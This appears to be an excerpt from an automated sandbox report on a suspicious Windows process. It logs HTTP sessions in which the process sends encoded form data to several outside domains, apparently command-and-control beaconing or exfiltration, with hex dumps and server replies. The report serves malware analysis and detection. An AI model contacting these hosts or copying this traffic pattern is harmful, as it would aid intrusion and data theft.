                                                                                  8192.168.2.649994163.44.185.183803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:26.207138062 CET561OUTGET /21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E= HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:32:26.991022110 CET192INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Nov 20, 2024 08:32:26.991189003 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0;
                                                                                  Nov 20, 2024 08:32:26.991261005 CET224INData Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: ter; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -m
                                                                                  Nov 20, 2024 08:32:26.991271019 CET1236INData Raw: 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: s-flex-wrap: wrap; flex-wrap: wrap; max-width: 640px; margin: 20px auto; } @media screen and (min-width: 640px) { .lol-error-page__information { -webkit-flex-wrap: nowrap; -
                                                                                  Nov 20, 2024 08:32:26.991332054 CET224INData Raw: 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 35 30 25 20 20 2d 20 31 30 70 78 29
                                                                                  Data Ascii: bsolute; z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border
                                                                                  Nov 20, 2024 08:32:26.991343021 CET1236INData Raw: 2d 63 6f 6c 6f 72 3a 20 23 66 63 33 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20
                                                                                  Data Ascii: -color: #fc3 transparent; } @media screen and (min-width: 640px) { .lol-error-page__information-balloon { -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__infor
                                                                                  Nov 20, 2024 08:32:26.991425991 CET224INData Raw: 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20
                                                                                  Data Ascii: t { margin-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javasc
                                                                                  Nov 20, 2024 08:32:26.991435051 CET1236INData Raw: 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 e3 82 b3 e3 83 94 e3 83 bc e3 83 a9 e3 82 a4 e3 83 88 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 74 43 6f 70 79 72 69 67 68 74 73 20 28 29 20 7b 0a 20 20 20 20 09 64 6f 63 75 6d 65 6e 74 2e 77 72 69
                                                                                  Data Ascii: ript"> // function setCopyrights () { document.write('copyright(c)2001-' + ' <a href="https://pepabo.com/" target="_blank">GMO</a> all rights reserved'); } </script></head><bod
                                                                                  Nov 20, 2024 08:32:26.991446018 CET224INData Raw: 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30 2e 38 32 34 2e 33 30 38 2d 34 2e 38 35 38 20 31 2e 39 35
                                                                                  Data Ascii: .253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2
                                                                                  Nov 20, 2024 08:32:26.991514921 CET1236INData Raw: 2e 31 38 20 32 2e 30 30 39 20 33 2e 36 33 35 20 31 2e 37 2e 36 34 36 2e 30 34 31 20 31 2e 32 38 34 2d 2e 31 35 32 20 31 2e 38 2d 2e 35 34 32 2e 35 32 34 2d 2e 36 33 32 2e 33 2d 32 2e 35 37 34 2e 30 37 35 2d 34 2e 35 31 35 2d 2e 31 32 2d 2e 39 39
                                                                                  Data Ascii: .18 2.009 3.635 1.7.646.041 1.284-.152 1.8-.542.524-.632.3-2.574.075-4.515-.12-.993-.239-2.047-.3-3.146-.061-1.099 0-2.167 0-3.161 0-1.9 0-3.853-.584-4.425-.447-.28-.978-.392-1.5-.316l.002-.002zm57.3.241c-.488-.051-.979.066-1.392.331-.6.557-.6
                                                                                  Nov 20, 2024 08:32:26.996211052 CET1236INData Raw: 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d 2e 30 33 32 20 31 2e 39 34 31 2d 2e 32 36 31 20 32 2e 38 32 39 2d 2e 36 37 33 20 34 2e 34 38
                                                                                  Data Ascii: .691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201 6.255-3.458 1.144-2.399 1.746-


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.649995172.67.162.12803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:32.227000952 CET813OUTPOST /m7wz/ HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.conansog.shop
                                                                                  Referer: http://www.conansog.shop/m7wz/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 39 33 39 33 48 49 53 6e 6a 57 41 72 6e 61 74 72 6b 6a 41 78 74 53 75 6d 39 68 79 56 39 41 79 53 36 36 77 2b 46 70 37 78 4f 68 43 42 46 36 76 37 53 75 2f 53 34 33 33 70 74 35 6b 33 78 48 4f 7a 54 4e 49 6e 59 43 2b 34 38 72 52 4e 62 77 42 7a 43 42 39 66 68 6d 49 72 6d 54 37 34 38 42 39 5a 74 79 64 37 4c 6f 48 79 6b 72 74 65 75 49 79 31 33 58 75 63 65 34 68 67 4a 45 5a 65 61 73 30 64 58 6c 65 62 68 45 6a 71 79 2b 62 59 64 63 70 66 7a 6c 65 79 2f 75 48 47 75 4b 6a 76 44 32 47 35 59 5a 42 39 58 41 46 65 41 5a 50 5a 55 45 62 79 66 4b 2f 36 57 73 32 46 5a 62 7a 79 49 41 58 74
                                                                                  Data Ascii: GR54yHZ8=p1DRQC/le5qi9393HISnjWArnatrkjAxtSum9hyV9AyS66w+Fp7xOhCBF6v7Su/S433pt5k3xHOzTNInYC+48rRNbwBzCB9fhmIrmT748B9Ztyd7LoHykrteuIy13Xuce4hgJEZeas0dXlebhEjqy+bYdcpfzley/uHGuKjvD2G5YZB9XAFeAZPZUEbyfK/6Ws2FZbzyIAXt
                                                                                  Nov 20, 2024 08:32:32.755002022 CET736INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:32 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8qsgZKpL5%2BIEMLkgPctW4ezvVIezvcx1vZFZN5KOK27eIP2yS09Rl6Pbie6JGA1GpFKwM9tjbc1NzZpgqLkaQxEiVkoxRXzYGLUqnHuSL4LBq2jQKSVVrXEpu5c%2F7U1lymrzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf27d96618b4-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.649996172.67.162.12803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:34.779586077 CET837OUTPOST /m7wz/ HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.conansog.shop
                                                                                  Referer: http://www.conansog.shop/m7wz/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 6d 53 36 59 34 2b 45 6f 37 78 43 42 43 42 52 71 75 7a 50 2b 2f 46 34 33 79 57 74 37 41 33 78 48 61 7a 54 50 41 6e 59 31 43 37 2b 37 52 50 58 51 42 78 66 52 39 66 68 6d 49 72 6d 58 62 53 38 41 5a 5a 74 43 74 37 4c 4e 37 39 36 37 74 66 70 49 79 31 67 48 75 59 65 34 68 57 4a 46 46 30 61 70 77 64 58 6b 75 62 69 56 6a 74 38 4f 62 53 41 4d 6f 7a 79 57 6e 49 77 2f 2b 68 67 64 62 32 59 6b 62 63 64 76 63 6e 4c 7a 46 39 53 4a 76 62 55 47 44 41 66 71 2f 51 55 73 4f 46 4c 4d 2f 56 48 30 79 4f 38 32 6c 35 79 57 76 38 34 38 39 48 61 6c 6b 75 6b 38 38 2b 6e 77 3d 3d
                                                                                  Data Ascii: GR54yHZ8=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79ymS6Y4+Eo7xCBCBRquzP+/F43yWt7A3xHazTPAnY1C7+7RPXQBxfR9fhmIrmXbS8AZZtCt7LN7967tfpIy1gHuYe4hWJFF0apwdXkubiVjt8ObSAMozyWnIw/+hgdb2YkbcdvcnLzF9SJvbUGDAfq/QUsOFLM/VH0yO82l5yWv8489Halkuk88+nw==
                                                                                  Nov 20, 2024 08:32:35.293843031 CET736INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:35 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2QjhaMdPZUpTPf9YQKgxyrpiCFTXdfj4i51kY9YJ94UdBGPC5e1MWP1souS5GFU9ZsrGVQ2tl7qCWEAXH6TsBpu1FspQnqLQc9qgt6%2FUoL5e3Ix1tKHD3tP2g%2Bn2zjEpy1NWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf37bc16c40c-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=837&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.649997172.67.162.12803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:37.335365057 CET1850OUTPOST /m7wz/ HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.conansog.shop
                                                                                  Referer: http://www.conansog.shop/m7wz/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 65 53 36 71 41 2b 46 4c 54 78 44 42 43 42 4f 61 75 79 50 2b 2f 45 34 33 4b 53 74 37 4d 34 78 46 69 7a 53 71 55 6e 54 68 57 37 33 37 52 50 4b 41 42 79 43 42 38 58 68 6d 59 6e 6d 54 2f 53 38 41 5a 5a 74 42 31 37 43 34 48 39 34 37 74 65 75 49 79 44 33 58 75 77 65 34 35 47 4a 46 78 4f 61 61 49 64 58 45 2b 62 79 33 4c 74 36 65 62 63 54 38 6f 72 79 58 62 74 77 2b 53 48 67 59 50 49 59 6b 76 63 64 59 31 77 54 67 70 34 4a 70 7a 63 43 68 72 62 58 66 58 44 54 74 47 48 4b 2b 44 44 46 56 2b 6d 6b 68 4d 6d 37 45 7a 34 77 65 42 6f 5a 44 52 34 6b 2b 34 36 6e 72 4c 38 63 7a 68 59 59 4b 42 69 34 62 50 6e 64 41 4d 44 68 71 6c 41 2b 4c 78 4d 62 6f 6b 4d 63 31 35 39 6d 63 39 35 30 47 5a 48 5a 6e 62 6e 41 36 32 51 73 6b 5a 32 63 69 38 52 53 39 38 54 5a 67 58 6b 55 36 73 39 4c 71 36 2f 4f 4c 56 31 4d 4d 4f 2b 70 44 39 30 34 35 61 71 70 71 68 46 6e 36 6d 78 41 77 64 48 58 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79yeS6qA+FLTxDBCBOauyP+/E43KSt7M4xFizSqUnThW737RPKAByCB8XhmYnmT/S8AZZtB17C4H947teuIyD3Xuwe45GJFxOaaIdXE+by3Lt6ebcT8oryXbtw+SHgYPIYkvcdY1wTgp4JpzcChrbXfXDTtGHK+DDFV+mkhMm7Ez4weBoZDR4k+46nrL8czhYYKBi4bPndAMDhqlA+LxMbokMc159mc950GZHZnbnA62QskZ2ci8RS98TZgXkU6s9Lq6/OLV1MMO+pD9045aqpqhFn6mxAwdHXL3pt3hgkEG9yEY56ZYHk+IqY4CJqxG54Zd1u0th24PhEX+jKGybVgP0z273tZusvR1hrd2BNkT+XKGmEU4e+d7wrXe3PUHoHKI9+tgnTC8Yyjux5knKZyL1K85G2R4Bmwjz0S6gceANJDzqM9s1oCbiPv5sKmJ8yRg2/qyx8VvvKDw+F0IWbYJlwpE9BLYU+cjzmCyd9I4TATYfdyTPVk6bZspuxQ8cG3uwL8kNjxjOHi9hoHCNLje8uP6Z3sPr8TswEQZ1jDwkYOOv8cfvdf7n+YEJA+os31CFWWMt+Y1f5/5mHDorhXzwmOGHA8pSg2Vf1a2nKLJN9Sbpd4nHLFT7xjs9p3+pAPrQ2CjFCXzQTgZxKCwdLsZc7t5z6M9hvSQp7QmoUW2afld/zFsHevGPPCdkowvX2suQ/tZ5ejsDdU2E8ixtUk/+C1XHZJ0o9RBpxPlClw3QUVrttrsYsuPi3jcXf/19LGmVJSOt1+BD8DE32qDn8M0a3RFQa2YvKYt4uWyeKYZnKDH5d2p/oxmd7NuvZxmomsbEjQmPYA2jajhvoUyAjexrM590QXHDJzMcLoQrynCAJ9a8ldeKKY9kQnVbMu7F4mt9jI7gBonY+gUtgfwPo6LOG+3lq5NbBVtrDf8eQg5NGbWG3uWsWECx6GFMM17LM1p [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:37.887171984 CET737INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:37 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fsOM0cobQUnoO9b4LskZpsWXiuu4iqNSuQgzfS9oIkeaXTh6881BbxO0BILvhBxIMpn36iJPjDWnrJEVzi5ZEhOAxdXH1oCuvyIJS13FxVD43xxum9oZbcSe%2FUJEI%2B0MZNeojw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf47eef07c81-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1850&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.649998172.67.162.12803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:39.880542994 CET555OUTGET /m7wz/?GR54yHZ8=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhLYFcCcGdRxpuCJbxh795ns7rh5kB8bzkZsIh+aAnGmWaZAVFBY=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:32:40.445230007 CET738INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:40 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtY4I4%2FPOl8mcAanVs610Df1xiU8L%2BOlIimEsI4ATtgSjSLCA5oEhz0l2Ia1b%2BKjrqq18l0uW7jVxxsam1eT0eEZY2RP2wbrewnLX9qrwjncEctnzKAgJOTSNwNfh0JGu1XNng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf57ec2f42b0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.64999985.159.66.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:45.587671041 CET819OUTPOST /80gy/ HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.beythome.online
                                                                                  Referer: http://www.beythome.online/80gy/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 35 44 48 66 6d 71 4f 44 39 36 6a 70 32 2b 37 4f 64 34 52 53 6a 64 6d 43 74 7a 78 6f 45 32 63 31 41 47 46 42 66 6e 78 42 2b 48 5a 43 4e 58 58 4a 52 6f 38 49 6e 7a 71 52 62 53 74 4f 68 69 58 48 4d 35 6b 68 70 7a 2b 4e 78 4f 4f 71 42 45 67 31 50 51 49 34 6e 54 36 6a 4a 4f 59 62 59 74 64 6b 63 64 36 59 73 46 70 51 72 32 34 5a 6d 42 71 58 77 36 64 74 38 48 65 41 58 61 53 59 56 4a 49 72 68 56 37 6e 55 44 38 68 73 59 73 70 44 4b 38 4b 7a 30 71 35 79 79 74 79 74 54 6c 72 7a 47 36 46 30 33 4c 46 64 61 4d 2f 55 61 62 37 77 4c 41 71 78 41 51 6a 41 51 47 76 72 37 54 36 48 47 52 46
                                                                                  Data Ascii: GR54yHZ8=Xqn0ftDeUaM65DHfmqOD96jp2+7Od4RSjdmCtzxoE2c1AGFBfnxB+HZCNXXJRo8InzqRbStOhiXHM5khpz+NxOOqBEg1PQI4nT6jJOYbYtdkcd6YsFpQr24ZmBqXw6dt8HeAXaSYVJIrhV7nUD8hsYspDK8Kz0q5yytytTlrzG6F03LFdaM/Uab7wLAqxAQjAQGvr7T6HGRF


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.65000085.159.66.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:48.138432026 CET843OUTPOST /80gy/ HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.beythome.online
                                                                                  Referer: http://www.beythome.online/80gy/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 49 31 48 6a 35 42 65 6a 6c 42 77 6e 5a 43 44 33 58 41 66 49 38 44 6e 7a 32 33 62 51 4a 4f 68 6d 2f 48 4d 34 55 68 6f 41 57 4f 77 65 4f 53 4a 6b 67 33 53 41 49 34 6e 54 36 6a 4a 4b 49 78 59 74 31 6b 63 73 4b 59 75 6b 70 54 6c 57 35 72 6e 42 71 58 30 36 64 32 38 48 65 79 58 59 72 7a 56 50 55 72 68 58 6a 6e 56 53 38 69 6c 59 73 72 4d 71 39 59 2b 78 33 6c 74 42 4d 33 75 68 4a 70 79 6e 4b 38 78 42 57 66 42 70 4d 63 47 4b 37 35 77 4a 59 59 78 67 51 4a 43 51 2b 76 35 73 66 64 49 79 30 6d 4b 52 35 4e 74 30 49 52 78 50 33 71 62 69 4e 71 5a 65 70 73 41 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEI1Hj5BejlBwnZCD3XAfI8Dnz23bQJOhm/HM4UhoAWOweOSJkg3SAI4nT6jJKIxYt1kcsKYukpTlW5rnBqX06d28HeyXYrzVPUrhXjnVS8ilYsrMq9Y+x3ltBM3uhJpynK8xBWfBpMcGK75wJYYxgQJCQ+v5sfdIy0mKR5Nt0IRxP3qbiNqZepsAg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.65000285.159.66.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
